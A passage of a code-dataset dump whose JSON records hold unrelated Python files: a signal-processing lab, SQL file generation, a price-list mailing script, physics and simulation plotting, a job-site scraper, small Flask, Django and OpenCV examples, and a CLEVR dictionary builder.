(i18n)\"\n self.defaultTarget = '0.18'\n\n def setDependencies(self):\n self.runtimeDependencies[\"virtual/base\"] = \"default\"\n self.runtimeDependencies[\"win32libs/win_iconv\"] = \"default\"\n\n\nclass Package(CMakePackageBase):\n def __init__(self, **args):\n CMakePackageBase.__init__(self)\n","sub_path":"win32libs/gettext/gettext.py","file_name":"gettext.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246705777","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef GenSig(N,k,type):\n A = np.zeros(N)\n if(type == 'I'):\n A[k] = 1\n if(type == 'S'):\n for i in range(k,N):\n A[i] = 1\n if(type == 'R'):\n for i in range(k,N):\n A[i] = i\n return A\n\ndef question_1_2():\n R = GenSig(20,5,'I') \n plt.figure(1) \n plt.stem(R) \n\ndef question_2():\n R = GenSig(20,5,'S') \n plt.figure(2) \n plt.stem(R) \n\ndef question_3():\n R = GenSig(20,5,'R') \n plt.figure(3) \n plt.stem(R) \n\ndef question_4():\n R = GenSig(20,6,'S') + GenSig(20,7,'R') - 6*GenSig(20,7,'S')\n R += -GenSig(20,11,'R') + 9*GenSig(20,11,'S') - GenSig(20,12,'R') \n R += 11*GenSig(20,12,'S') + GenSig(20,16,'R') - 15*GenSig(20,16,'S')\n plt.figure(4) \n plt.stem(R)\n\ndef genSin(N,f,fs):\n t = np.linspace(0,(N-1)/fs,N)\n R = np.sin(2 * np.pi * f * t)\n plt.figure(5) \n plt.stem(R)\n \ndef genCos(N,f,fs):\n R = np.zeros(N)\n for i in range(f,N):\n R[i] = np.cos(2 * np.pi * f * (i/fs))\n plt.figure(6) \n plt.plot(R)\n\ndef question_5_2(N,f,fs):\n t = np.linspace(0,(N-1)/fs,N)\n R = np.sign(np.sin(2 * np.pi * f * t))\n plt.figure(7) \n plt.plot(R)\n\ndef question_5_2_alt(N,f,fs):\n R = np.zeros(fs*(f+1))\n T = np.zeros(N)\n for i in range(0,f+1):\n nb = i * fs\n for j in range(1,fs+1):\n if((j <= (fs/2)+1) and (nb+j-1 != nb)):\n R[nb+j-1] = 1\n else : \n R[nb+j-1] = -1\n R[0] = 0\n for i in range(0,N):\n T[i] = R[i]\n plt.figure(8) \n plt.plot(T)\n plt.stem(T)\n \ndef question_5_3(f,fs):\n return f*fs\n\nimport cmath as cm\ndef expsig(n,a):\n isreal = np.isreal(a)\n result = np.zeros(n)\n if(isreal == True):\n for i in range(n):\n result[i] = np.power(i,a)\n else :\n theta = cm.phase(a)\n for i in range(n):\n result[i] = (a.real**i) * (np.cos(theta * i) + np.sin(theta * i)) \n print(result)\n plt.figure(9)\n plt.plot(result)\n plt.stem(result)\n \na = 0.95 ** cm.exp(complex(0.0,(np.pi/10)))\nexpsig(50,a)","sub_path":"2163_Traitement_Numerique/TP2/.ipynb_checkpoints/TP2(1)-checkpoint.py","file_name":"TP2(1)-checkpoint.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"544254592","text":"import re\n\n\"\"\"\nCount what number of line it is\n\"\"\"\n\ncount = 31\ncode_name = \"code.txt\"\n\nif_position1 = 42\nif_position2 = 67\n\nf_position1 = 51\nf_position2 = 96\n\ndef rm(text):\n\n\trm = re.compile(r\"\\n\")\n\n\treturn rm.sub(\"\", text)\n\n# `````````````````````````````````````````````\n# Configs\n# Change these lines of code if you're switching the tables.\n\ntemplate_name = \"template.sql\"\nfile_name = \"sql_if.sql\"\n\noutput_head = \"delete_if/DEL_IF_EDASH_STATISTICSDATA_\"\noutput_tail = \".sql\"\n\nposition1 = if_position1\nposition2 = if_position2\n\n\n# `````````````````````````````````````````````\n\ntexts = \"\"\n\ncode = \"\"\ntemplate = \"\"\n\nwith open(template_name, \"r\", encoding=\"utf-8\") as f:\n\ttemplate = f.read()\n\nstr_head = template[0:position1]\n# str_mid = template[position1:position2]\nstr_tail = template[position2:]\n\n\nf = open(code_name, \"r\", encoding=\"utf-8\")\n\nfor index in range(count):\n\n\ttext = \"\"\n\n\tcode = rm(f.readline())\n\n\tif len(code) == 25:\n\n\t\ttext = str_head + code + str_tail\n\n\t\t# Comment this line of code if you're deleting\n\t\t# text = text + code + str_tail\n\n\t\t# print(text)\n\n\t\t#texts = texts + text + \"\\n\\n\"\n\n\twith open(output_head+code+output_tail, \"w\", encoding=\"utf-8\") as f_h:\n\t\tf_h.write(text)\n\t\t\nf.close()\n\n# with open(file_name, \"w\", encoding=\"utf-8\") as f:\n# \tf.write(texts)\n\n# print(\"Successfully generated .sql file.\")\n","sub_path":"code/sql/create_sql.py","file_name":"create_sql.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"442874856","text":"import ftplib\nfrom datetime import date,datetime\nimport requests\nfrom zipfile import ZipFile\nimport smtplib,ssl\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nfrom email import encoders\nimport os\n\ntoday1= datetime.today().strftime('%Y.%m.%d')\ntoday = datetime.today().strftime('%d-%m-%Y')\nSUBJECT = f\"Brodos Pricelist citytalk {today}\"\nEMAIL_TO = ['hardware@citytalk.gmbh','Vertrieb-Hardware@brodos.de','rncteam@brodos.net']\n#EMAIL_TO = ['ankur.paranjpe@brodos.net','yash.joshi@brodos.net']\n\n\nmessage_failed = \"\"\"From: \nSubject: City Talk Pricelist Error!\n\nCity Talk Pricelist didnt found on the required path or not refreshed successfully. Please check manually!\n\"\"\"\n\ntry:\n msg = MIMEMultipart()\n msg['Subject'] = SUBJECT \n msg['From'] = 'rncteam@brodos.net'\n msg['To'] = ', '.join(EMAIL_TO)\n #msg['Bcc'] = ['distribution@brodos.de']\n part = MIMEBase('application', \"octet-stream\")\n part.set_payload(open(f\"I:/Abteilungen/Reporting_und_Controlling/private/Preislisten/2xm_City Talk/testingxlsx/Brodos PRL {today1}.xlsx\", \"rb\").read(),'UTF-8')\n encoders.encode_base64(part)\n part.add_header('Content-Disposition', f'attachment; filename=\"Brodos PRL {today1}.xlsx\"')\n msg.attach(part)\n body = f\"\"\"Hallo Herr Zintl,\\n\\n\nanbei sende ich Ihnen wie gewünscht eine Liste mit aktuellen Preisen und Lagerbeständen aus dem Brodos Lager.\\n\\n\nSie sind dazu verpflichtet die Liste vertraulich zu behandeln und nicht an Dritte weiter zu geben.\\n\\n\nAlle Bestellungen von Ihnen sind verbindlich und werden sofort bearbeitet und versendet.\\n\\n\nFür alle weiteren Richtlinien zu Zahlungsbedingungen und Lieferbedingungen gelten unsere AGBs.\"\"\"\n part2 = MIMEText(body,'plain')\n msg.attach(part2)\n server = smtplib.SMTP('172.17.7.101')\n server.sendmail('rncteam@brodos.net', EMAIL_TO, msg.as_string())\n \nexcept Exception as e:\n print(e)\n smtpObj = smtplib.SMTP('172.17.7.101')\n smtpObj.sendmail('rncteam@brodos.net', 'rncteam@brodos.net', message_failed) \n\n\n","sub_path":"2xm_city talk/mail_sending.py","file_name":"mail_sending.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"408062377","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom measurements.susdtt import SusDtt\nfrom models.susmodel import SusModel\n\ndef bode_model(optic,stage,dof): \n model = SusModel(optic) \n start = 'ctrl_typeBp/exc_{0}{1}'.format(stage,dof)\n \n # These differencies should be eliminated.. \n if stage=='IM':\n end = 'ctrl_typeBp/OSEM_{0}{1}'.format(stage,dof)\n elif stage in ['SF','BF'] and dof=='GAS':\n end = 'ctrl_typeBp/LVDT_{0}{1}'.format(stage,dof) \n elif stage=='BF':\n end = 'ctrl_typeBp/LVDT_{0}{1}'.format(stage,dof)\n elif stage=='TM':\n end = 'ctrl_typeBp/OpLev_{0}{1}'.format(stage,dof)\n else:\n raise ValueError('!')\n freq = np.logspace(-2,1,1001) \n freq,gain = model.tf(start,end,freq)\n return freq, gain\n\ndef bode_measurement(optic,stage,dof):\n prefix = './measurements/{0}/'.format(optic)\n fname = prefix + '{0}_{1}{2}.xml'.format(optic,stage,dof)\n meas = SusDtt(fname)\n _from = 'K1:VIS-{0}_{1}_TEST_{2}_EXC'.format(optic,stage,dof)\n\n # These differencies should be eliminated..\n if optic=='PR2' and stage=='BF' and dof!='GAS':\n _to = 'K1:VIS-{0}_{1}_DAMP_{2}_IN1'.format(optic,stage,dof)\n elif optic=='PR2' and stage=='IM' and dof in ['L','R','P','Y']:\n _to = 'K1:VIS-{0}_{1}_DAMP_{2}_IN1'.format(optic,stage,dof) \n elif stage in ['IP','SF','BF','IM']:\n _to = 'K1:VIS-{0}_{1}_DAMP_{2}_IN1_DQ'.format(optic,stage,dof) \n elif stage=='TM':\n _dict = {'L':'LEN','P':'PIT','Y':'YAW'}\n _to = 'K1:VIS-{0}_{1}_OPLEV_{2}_DIAG_DQ'.format(optic,stage,_dict[dof])\n else:\n raise ValueError('!')\n \n _freq, _gain, _coh = meas.tf(_from,_to)\n return _freq, _gain, _coh\n\ndef plot_compliance(optic,stage,dofs): \n fig,ax = plt.subplots(3,3,sharex='col',sharey='row',figsize=(10,6))\n plt.subplots_adjust(hspace=0.1, wspace=0.15,\n left=0.1, right=0.95,\n top=0.88, bottom=0.1)\n\n title = 'Compliance of {0}_{1}_{2}.png'.format(optic,stage,''.join(dofs))\n plt.suptitle(title,fontsize=18)\n for i,dof in enumerate(dofs[:3]):\n freq, gain = bode_model(optic,stage,dof)\n _freq, _gain, _coh = bode_measurement(optic,stage,dof)\n gain *= np.mean((np.abs(_gain)[:5]/np.abs(gain)[:5])) #[1]\n ax[0][i].loglog(freq,np.abs(gain),'k-',label='Model')\n ax[0][i].loglog(_freq,np.abs(_gain),'ro',markersize=2,\n label='Measurement')\n ax[1][i].semilogx(freq,np.rad2deg(np.angle(gain)),'k-')\n ax[1][i].semilogx(_freq,np.rad2deg(np.angle(_gain)),'ro',\n markersize=2,label='Measured')\n ax[0][i].set_title('{0} -> {1}'.format(dof,dof))\n ax[2][i].semilogx(_freq,_coh,'ro',markersize=2)\n ax[1][i].set_xlim(1e-2,1e1) \n ax[1][i].set_yticks(range(-180,181,90))\n ax[2][i].set_xlabel('Frequency [Hz]')\n ax[1][i].grid(which='major',color='black',linestyle='-')\n ax[1][i].grid(which='minor',color='black',linestyle=':')\n ax[0][i].grid(which='major',color='black',linestyle='-')\n ax[0][i].grid(which='minor',color='black',linestyle=':')\n ax[2][i].grid(which='major',color='black',linestyle='-')\n ax[2][i].grid(which='minor',color='black',linestyle=':')\n ax[0][i].legend(loc='upper left')\n ax[0][0].set_ylabel('Magnitude')\n ax[1][0].set_ylabel('Phase [Degree]')\n ax[2][0].set_ylabel('Coherence')\n ax[0][0].set_ylim(1e-4,1e2)\n ax[1][0].set_ylim(-181,181)\n ax[2][0].set_ylim(0,1)\n fname = './figures/Compliance_{0}_{1}_{2}.png'.format(optic,stage,''.join(dofs))\n plt.savefig(fname)\n print(fname)\n plt.close()\n \n # [1] Adjust the model data to the measured one. Note that the\n # data points in lower frequency are unreliable.\n\n\nif __name__=='__main__':\n plot_compliance('PR2','SF',['GAS'])\n plot_compliance('PR2','BF',['GAS']) \n plot_compliance('PR2','BF',['L','T','V'])\n plot_compliance('PR2','BF',['R','P','Y']) \n plot_compliance('PR2','IM',['L','T','V'])\n plot_compliance('PR2','IM',['R','P','Y'])\n plot_compliance('PR2','TM',['L','P','Y'])\n plot_compliance('PR3','SF',['GAS'])\n plot_compliance('PR3','BF',['GAS']) \n plot_compliance('PR3','BF',['L','T','V'])\n plot_compliance('PR3','BF',['R','P','Y']) \n plot_compliance('PR3','IM',['L','T','V'])\n plot_compliance('PR3','IM',['R','P','Y'])\n plot_compliance('PR3','TM',['L','P','Y'])\n plot_compliance('PRM','SF',['GAS'])\n plot_compliance('PRM','BF',['GAS']) \n plot_compliance('PRM','BF',['L','T','V'])\n plot_compliance('PRM','BF',['R','P','Y']) \n plot_compliance('PRM','IM',['L','T','V'])\n plot_compliance('PRM','IM',['R','P','Y'])\n plot_compliance('PRM','TM',['L','P','Y'])\n","sub_path":"example_compare_tf.py","file_name":"example_compare_tf.py","file_ext":"py","file_size_in_byte":4825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"606976809","text":"\"\"\"\nThis constructs a single nanoparticle with 20 ligands and outputs a data file containing data for\nthat nanoparticle and a membrane, and a LAMMPS script to read that data and run a demo simulation.\nIf run as a python script it will run the generated LAMMPS script and produce plotable output in a\n'demo' folder.\n\"\"\"\n \nfrom nanoparticle import NanoParticle, Ligand\nfrom membranesimulation import MembraneSimulation\n\nimport parlammps\n\nimport math\nimport os\nimport argparse\n\nparser = argparse.ArgumentParser(description='Creates and runs a demo simulation.')\n\n#MPI Options\nparser.add_argument('-mpi','--mpi', action='store_true', help='option to run in parallel')\nparser.add_argument('-np','--nodes', default=4, type=int, help='number of cores used per mpi process')\nparser.add_argument('-tm','--timeout', default=1800, type=int, help='mpirun timeout')\n\nparser.add_argument('-c','--clean', action='store_true', help='option to remove data and script files when done')\n\nargs = parser.parse_args()\n\n# nanoparticle parameters don't change a thing because they are hardcoded in the data & script templates !!?!\nnp = NanoParticle()\nfor i in range(4):\n phi = i*(math.pi/2)\n for j in range(5):\n theta = math.pi/10 + j*(math.pi/5)\n np.addLigand(Ligand(rad=np.sig, polAng=theta, aziAng=phi, mass=1.0, eps=10.0, sig=1.0))\n\nwd = os.path.dirname(os.path.realpath(__file__))\n \nsimulation = MembraneSimulation(\"demo\", np, 10000, 0.01, os.path.join(wd,'demo'), os.path.join(wd,'demo'),\n os.path.join(wd,'mem/template/data.template'),\n os.path.join(wd,'mem/template/in.template'),\n corepos_x=0.0, corepos_y=0.0, corepos_z=7.0)\n\nsimulation.saveFiles()\nscript = os.path.join(simulation.filedir, simulation.scriptName)\n \nif (args.mpi):\n parlammps.runSim(script, args.nodes, args.timeout, silent=False)\nelse:\n parlammps.runSimSerial(script)\n\nif (args.clean):\n simulation.deleteFiles()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"550511764","text":"#!/usr/bin/env python\n\nimport string\nimport math\nimport re\nimport sys\nimport numpy as np\n\nfrom numba import jit\n\ndebug=False\nfileName = \"input2.txt\"\n\n## Load and permutate the rules\nrules = {}\nfor l in map(lambda x: x.strip(), open(fileName).readlines()):\n\tm = re.search('(.*) => (.*)?$',l)\n\tr1 = \"\".join(m.group(1).strip().split(\"/\"))\n\tr2 = \"\".join(m.group(2).strip().split(\"/\"))\n\tr1 = np.array( [1 if c ==\"#\" else 0 for c in r1])\n\t\n\n\tif len(r1) == 4:\n\t\tr1 = r1.reshape((2,2))\n\telse:\n\t\tr1 = r1.reshape((3,3))\n\n\tfor k in range(4):\n\t\trot = np.rot90(r1, k=k)\n\t\ttmp = \"\".join(['#' if c==1 else '.' for c in rot.flatten()])\n\t\trules[tmp] = r2\n\t\ttmp = \"\".join(['#' if c==1 else '.' for c in np.fliplr(rot).flatten()])\n\t\trules[tmp] = r2\n\t\ttmp = \"\".join(['#' if c==1 else '.' for c in np.flipud(rot).flatten()])\n\t\trules[tmp] = r2\n\n## Look up the correct rule and return it\ndef recode(x):\n\tglobal rules\n\ty = \"\".join(x)\n\treturn list(rules[y])\n\n## return the subcube in range with w\n@jit\ndef getRange(cube, x,y,w):\n\tret = []\n\tx = int(x)\n\ty = int(y)\n\tw = int(w)\n\n\tlineW = int( math.sqrt(len(cube)))\n\tfor i in range(w):\n\t\tt = ((y+i)*lineW)+x\n\t\tret = ret + cube[ t:t+w ]\n\treturn ret\n\n## take the 4 subparts and combine back into a full cube\ndef combineCubes(q1,q2,q3,q4):\n\tlineW = int( math.sqrt(len(q1)))\n\tr1 = []\n\tr2 = []\n\tfor i in range(lineW):\n\t\t\tr1 = r1 + q1[i*lineW:i*lineW+lineW] + q2[i*lineW:i*lineW+lineW]\n\t\t\tr2 = r2 + q3[i*lineW:i*lineW+lineW] + q4[i*lineW:i*lineW+lineW]\n\treturn r1+r2\n\n@jit\ndef getSubCubes(cube, s):\n\tsubCubes = []\n\tl = len(cube)\n\tsideLength = int(math.sqrt(l)) # how long is each side\n\tcubesPerRow = int(sideLength / s) # how many cubes in each row\n\n\tfor y in range(0,cubesPerRow):\n\t\tfor x in range(0,cubesPerRow):\n\t\t\tsubCubes.append( getRange(cube, x*s,y*s,s) )\n\treturn subCubes\n\n\n#cube = list('#..#........#..#')\n@jit\ndef combineSubCubes(cubes):\n\treturnCube = []\n\tnumCubes =len(cubes)\n\tcubesPerRow = int(math.sqrt(numCubes))\n\tcubesize = int(math.sqrt(len(cubes[0])))\n\n\t#print( numCubes, cubesPerRow, cubesize)\n\tfor i in range(0, numCubes, cubesPerRow):\n\t\tfor z in range(0, cubesize):\n\t\t\tfor k in range(0, cubesPerRow):\n\t\t\t\treturnCube = returnCube + cubes[i+k][(z*cubesize):(z*cubesize+cubesize)]\n\n\treturn returnCube\n\ndef printCube(cube):\n\tl = len(cube)\n\tsideLength = int(math.sqrt(l))\n\tfor i in range(sideLength):\n\t\tprint( \"\".join(cube[i*sideLength: i*sideLength+sideLength]))\n\tprint()\n\n\ncube = list('.#...####')\n\nfor i in range(0,18):\n\tl = len(cube)\n\tif l % 2 == 0:\n\t\tcube = list(map(lambda x: recode(x), getSubCubes(cube,2)))\n\t\t#print(cube)\n\t\tcube = combineSubCubes(cube)\n\t\t#printCube(cube)\n\telse:\n\t\tcube = list(map(lambda x: recode(x), getSubCubes(cube,3)))\n\t\t#print(cube)\n\t\tcube = combineSubCubes(cube)\n\t\t#printCube(cube)\n\t\n\tprint(i,len(list(filter(lambda x: x=='#', cube))))\n","sub_path":"day21/day21.py","file_name":"day21.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"131323911","text":"# -*- coding: utf-8 -*-\n\"\"\"\n This spider is a AutoHireJobs spider created on top of the ATSSpider\n scrapy crawl autohirejobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://autohire.careershop.com/ardentmillsexternal/JobSearch/JobSearchList.asp\"\n\n sample seed urls:\n http://autohire.careershop.com/midwayslots/JobSearch/JobSearchList.asp\n http://autohire.careershop.com/septajobs/JobSearch/JobSearchList.asp\n http://autohire.careershop.com/kdmc/JobSearch/JobSearchList.asp\n http://autohire.careershop.com/cree/JobSearch/JobSearchList.asp?\n http://autohire.careershop.com/cree_europe/JobSearch/JobSearchList.asp?\n\n sample job url:\n http://autohire.careershop.com/ardentmillsexternal/JobSearch/JobCenterViewCndt.asp?JobAd_Id=956771\n\"\"\"\n\nfrom re import compile\nfrom scrapy.http import Request\nfrom scrapy.http import FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, RemoveBadElements, NormalizedJoin\n\nNext_Page = compile(r\"nextPage\\((\\d+)\\)\")\n\n\nclass AutoHireJobs(ATSSpider):\n\n name = \"autohirejobs\"\n\n def parse(self, response):\n selector = Selector(response)\n jobs = selector.xpath('//table[@id=\"Table3\"]//tr')\n for job in jobs:\n url = job.xpath('./td//a[@class=\"joblistText\"]/@href').extract()\n if url:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'date': job.xpath('./td[4]//text()').extract(),\n 'location': job.xpath('./td[3]//text()').extract(),\n 'ref_num': job.xpath('./td[1]/span/text()').extract(),\n },\n url=urljoin(response.url, url[0])\n )\n\n next_page = Next_Page.search(''.join(selector.xpath('//a[contains(text(), \"%s\")]/@href' % unicode('»', 'utf-8')).extract()))\n if next_page:\n yield FormRequest(\n callback=self.parse,\n formdata={\n 'Page': next_page.group(1),\n 'SortOrder': '',\n 'AscDesc': '',\n 'PrevSortOrder': ''\n },\n url=response.url\n )\n\n def parse_job(self, response):\n selector = Selector(response)\n loader = BrightcorpItemLoader(selector=selector)\n\n loader.add_xpath(\n 'description',\n '//tr//*[contains(text(), \"Job Description\")]/../../following-sibling::tr',\n RemoveBadElements(['a'])\n )\n loader.add_xpath(\n 'educationrequirements',\n '//*[contains(text(), \"Degree Required\")]/../following-sibling::td//text()'\n )\n loader.add_xpath(\n 'experiencerequirements',\n '//*[contains(text(), \"Years of Work Experience\")]/../following-sibling::td//text()'\n )\n\n loader.add_xpath(\n 'jobtype',\n [\n '//*[contains(text(), \"Position Type\")]/../following-sibling::td//text()',\n '//*[contains(text(), \"Type of Assignment\")]/../following-sibling::td//text()',\n ],\n NormalizedJoin(\", \")\n )\n loader.add_xpath('jobcategory', '//*[contains(text(), \"Category\")]/../following-sibling::td//text()')\n loader.add_xpath('title', '//*[contains(text(), \"Job Title\")]/../following-sibling::td//text()')\n loader.add_xpath('zip_code', '//*[contains(text(), \"Postal Code\")]/../following-sibling::td//text()')\n\n loader.add_value('apply_url', response.url)\n loader.add_value('date', response.meta.get('date'))\n loader.add_value('location', response.meta.get('location'))\n loader.add_value('referencenumber', response.meta.get('ref_num'), Prefix('%s-' % self.name))\n loader.add_value('url', response.url)\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/autohirejobs.py","file_name":"autohirejobs.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"294566904","text":"# Tyler Bade\n# February 4\n# Lab quiz 1\n\n# String prompt\nuserInput = input(\"Please enter a string: \")\nuserStr = str(userInput)\n\n# Empty string case\nif userStr == \"\":\n print(\"Empty string\")\n\n# Second character\nelif len(userStr) % 2 == 0:\n second = userStr[1]\n print(\"The second character is \", second)\n if userStr.endswith(userStr[0]):\n print(\"Bookends\")\n\n# Middle character\nelse:\n mid = len(userStr) // 2\n if userStr[mid].isdigit():\n print(\"The middle character is a digit\")\n\n# End\nprint(\"Done\")\n","sub_path":"IT 210 - Fundamentals of Programming/Labs/LabQuiz1.py","file_name":"LabQuiz1.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"186489256","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\ntest_site settings\n\"\"\"\n\nimport os\n\nPROJECT_ROOT = os.path.dirname(os.path.abspath(__file__))\n\n# django settings\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(PROJECT_ROOT, 'test.sqlite'),\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': '',\n 'PORT': '',\n }\n}\n\nDEBUG = True\n\nINSTALLED_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'south',\n 'kombu.transport.django',\n 'djcelery',\n 'rsstwitter'\n]\n\nINTERNAL_IPS = ('127.0.0.1',)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'formatters': {\n 'simple': {\n 'format': \"%(levelname)-8s \"\n \"%(name)s:%(funcName)s:%(lineno)d %(message)s\"\n },\n },\n 'handlers': {\n 'console': {\n 'level':'NOTSET',\n 'class':'logging.StreamHandler',\n 'formatter': 'simple'\n }\n },\n 'loggers': {\n 'django': {\n 'level': 'DEBUG',\n 'propagate': True,\n 'handlers': ('console',)\n }\n },\n 'root': {\n 'level': 'DEBUG',\n 'propagate': True,\n 'handlers': ('console',)\n }\n}\n\nMEDIA_ROOT = os.path.join(PROJECT_ROOT, 'media')\nMEDIA_URL = '/media/'\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware'\n)\n\nROOT_URLCONF = 'test_site.urls'\n\nSITE_ID = 1\n\nSTATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')\nSTATIC_URL = '/static/'\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.contrib.messages.context_processors.messages\"\n)\n\nTIME_ZONE = 'UTC'\nDATE_FORMAT = 'Y-m-d'\nDATETIME_FORMAT = 'Y-m-d H:i'\n\n# celery\n\nCELERYBEAT_LOG_LEVEL = 'DEBUG'\nCELERYD_LOG_LEVEL = CELERYBEAT_LOG_LEVEL\nCELERYD_CONCURRENCY = 1\nBROKER_URL = \"django://\"\nCELERYBEAT_SCHEDULER = \"djcelery.schedulers.DatabaseScheduler\"\n\nfrom datetime import timedelta\nimport djcelery\n\nCELERYBEAT_SCHEDULE = {\n 'runs-every-hour': {\n 'task': 'rsstwitter.tasks.refresh',\n 'schedule': timedelta(seconds=3600)\n }\n}\n\ndjcelery.setup_loader()\n","sub_path":"test_site/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221834569","text":"import numpy as np\nimport cv2 \nfrom matplotlib import pyplot as plt\nfrom matplotlib import colors\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\n\n\ndarkorg = cv2.cvtColor(cv2.imread('dark.jpg'), cv2.COLOR_RGB2BGR)\ndark = darkorg\nhsv_dark = cv2.cvtColor(dark, cv2.COLOR_BGR2HSV)\n\nplt.subplot(1,2,1)\nplt.imshow(darkorg)\nplt.title('Original Image')\nplt.xticks([])\nplt.yticks([])\n\n# h, s, v = cv2.split(hsv_dark)\n# fig = plt.figure() \n# axis = fig.add_subplot(1, 1, 1, projection=\"3d\")\n\n# pixel_colors = dark.reshape((np.shape(dark)[0]*np.shape(dark)[1], 3))\n# norm = colors.Normalize(vmin=-1.,vmax=1.)\n# norm.autoscale(pixel_colors)\n# pixel_colors = norm(pixel_colors).tolist()\n\n\n# axis.scatter(h.flatten(), s.flatten(), v.flatten(), facecolors=pixel_colors, marker=\".\")\n# axis.set_xlabel(\"Hue\")\n# axis.set_ylabel(\"Saturation\")\n# axis.set_zlabel(\"Value\")\n# plt.show()\n\nreddown = (115, 0, 0)\nredup = (150, 255, 255)\n\nmask = cv2.inRange(hsv_dark, reddown, redup)\nresult = cv2.bitwise_and(dark, dark, mask=mask)\n\ndark -= result\n\nresult = cv2.cvtColor(result, cv2.COLOR_RGB2BGR)\ndark +=result\n\nplt.subplot(1,2,2)\nplt.imshow(dark)\nplt.title('Modified Image')\nplt.xticks([])\nplt.yticks([])\n\n\n\nplt.show()\ncv2.destroyAllWindows()\n","sub_path":"OpenCV/q13.py","file_name":"q13.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"89819173","text":"from flask import Flask, request, redirect, session, flash, render_template\n\n\napp = Flask(__name__)\napp.secret_key = \"unicorns\"\n\n\n@app.route('/')\ndef index():\n if \"info\" not in session:\n session['info'] = \"\"\n return render_template(\"index.html\")\n\n\n@app.route(\"/form\", methods=[\"GET\", \"POST\"])\ndef form():\n if len(request.form['FirstName']) < 1 or len(request.form['LastName']) < 1:\n flash(\"Please Complete Form\")\n else:\n session['info'] = [request.form[\"FirstName\"], request.form['LastName'],\n request.form['FaveSnack']]\n\n return redirect('/')\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"553804662","text":"import json\nimport os\nimport pickle\nimport re\nimport math\n\nimport nltk\nimport torch\nfrom tqdm import tqdm\nimport shutil\nimport numpy as np\n\nclasses = {\n 'number':['0','1','2','3','4','5','6','7','8','9','10'],\n 'material':['rubber','metal'],\n 'color':['cyan','blue','yellow','purple','red','green','gray','brown'],\n 'shape':['sphere','cube','cylinder'],\n 'size':['large','small'],\n 'exist':['yes','no']\n }\n\ndef tokenize(sentence):\n # punctuation should be separated from the words\n s = re.sub('([.,;:!?()])', r' \\1 ', sentence)\n s = re.sub('\\s{2,}', ' ', s)\n\n # tokenize\n split = s.split()\n\n # normalize all words to lowercase\n lower = [w.lower() for w in split]\n return lower\n\ndef build_dictionaries(clevr_dir):\n\n def compute_class(answer):\n for name,values in classes.items():\n if answer in values:\n return name\n \n raise ValueError('Answer {} does not belong to a known class'.format(answer))\n \n cached_dictionaries_orig = os.path.join(clevr_dir, 'questions', 'CLEVR_built_dictionaries.pkl')\n cached_dictionaries = os.path.join(clevr_dir, 'CLEVR-Humans', 'CLEVR_built_dictionaries.pkl')\n\n if os.path.exists(cached_dictionaries):\n print('==> using cached dictionaries: {}'.format(cached_dictionaries))\n with open(cached_dictionaries, 'rb') as f:\n return pickle.load(f)\n \n with open(cached_dictionaries_orig, 'rb') as f:\n quest_to_ix, answ_to_ix, answ_ix_to_class = pickle.load(f)\n\n # quest_to_ix = {}\n # answ_to_ix = {}\n # answ_ix_to_class = {}\n json_train_filename = os.path.join(clevr_dir, 'CLEVR-Humans', 'CLEVR-Humans-train.json')\n #load all words from all 